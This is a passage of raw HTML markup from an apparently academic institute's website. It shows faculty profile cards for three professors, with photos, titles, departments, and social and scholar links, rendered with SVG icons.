11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c40-outer\">\n            <div data-colibri-id=\"182-c40\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c40 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c41\" class=\"d-block style-973 style-local-182-c41 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/08/hu_new-1.jpg\" class=\"wp-image-1348 style-973-image style-local-182-c41-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c41-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c42\" class=\"h-global-transition-all h-heading style-974 style-local-182-c42 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c42\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Xiaolin Hu</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c43\" class=\"h-text h-text-component style-975 style-local-182-c43 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c44\" class=\"h-text h-text-component style-976 style-local-182-c44 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c45\" class=\"style-977 style-local-182-c45 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://csds.gsu.edu/profile/xiaolin-hu/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=zeU19nAAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c46-outer\">\n            <div data-colibri-id=\"182-c46\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c46 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c47\" class=\"d-block style-973 style-local-182-c47 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-patterson.jpg\" class=\"wp-image-1391 style-973-image style-local-182-c47-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c47-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c48\" class=\"h-global-transition-all h-heading style-974 style-local-182-c48 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c48\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Murray Patterson</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c49\" class=\"h-text h-text-component style-975 style-local-182-c49 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Assistant Professor&nbsp;</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c50\" class=\"h-text h-text-component style-976 style-local-182-c50 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c51\" class=\"style-977 style-local-182-c51 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/murray-patterson-449a947\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/murray-patterson/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=X4J8vAEAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c52-outer\">\n            <div data-colibri-id=\"182-c52\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c52 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c53\" class=\"d-block style-973 style-local-182-c53 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Taylor-shelton_300x300.jpeg\" class=\"wp-image-705 style-973-image style-local-182-c53-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c53-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c54\" class=\"h-global-transition-all h-heading style-974 style-local-182-c54 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c54\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Taylor Shelton</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c55\" class=\"h-text h-text-component style-975 style-local-182-c55 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Assistant Professor</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c56\" class=\"h-text h-text-component style-976 style-local-182-c56 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c57\" class=\"style-977 style-local-182-c57 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/taylor-shelton-28a4b3291\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/taylor-shelton/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=WFA1Ry8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 